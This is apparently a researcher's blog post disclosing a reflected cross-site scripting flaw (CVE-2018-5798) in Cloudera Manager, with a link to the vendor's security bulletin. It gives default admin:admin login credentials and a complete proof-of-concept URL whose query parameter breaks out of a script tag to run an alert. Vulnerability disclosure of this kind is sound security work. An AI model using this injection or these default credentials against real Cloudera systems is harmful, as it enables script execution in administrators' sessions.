Mar 23 2025

CVE-2018-5798 – Cross-site scripting vulnerability in Cloudera Manager – Part 2

Author: Shafeeque Olassery Kunnikkal | Category: Cross Site Scripting, CVE-2018-5798, Cyber Security | Leave a Comment

Below is the details of the reflected XSS , I have found in Cloudera Enterprise. More details can be found here :-  https://www.cloudera.com/documentation/other/securitybulletins/topics/Security-Bulletin.html#DOCS-3186

Login to Cloudera manager using credentials
admin:admin

1. Navigate the following URL which includes the XSS Payload.

xss

2. Navigate the following URL in browser after login to Cloudera Manager, use these credentials for login:- admin:admin

http://localhost:7180/cmf/config2/dialog?metadataUrl=%2fcmf%2fclusters%2f1%2fsearchConfig%2fmetadata.json%3fserviceDep%3dtrue%26q%3dspark_on_yarn%3C%2fscript%3E%3Cscript%3Ealert%28%27reflected%20xss%27%29%3C%2fscript%3E

Will see the XSS payload executed as shown in the image below.

XSS

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *

Categories

Tags

zero-knowledge testing Cyber Security Degree Vulnerability Assessment Social Engineering CVE-2018-5798 Education Penetration Testing Cyber Security IBM Maximo Asset Management Phishing Cloudera Manager White Box Penetration Testing Grey Box Penetration Testing SDR Reflected XSS CubicSDR CVE-2018-1528 E-Books partial-knowledge testing Information Security Career Options Career Email Fraud Black Box Penetration Testing Computer Forensics Degree Cloudera Enterprise Ethical Hacking Computer Forensics XSS complete-knowledge testing Clickjacking

Archives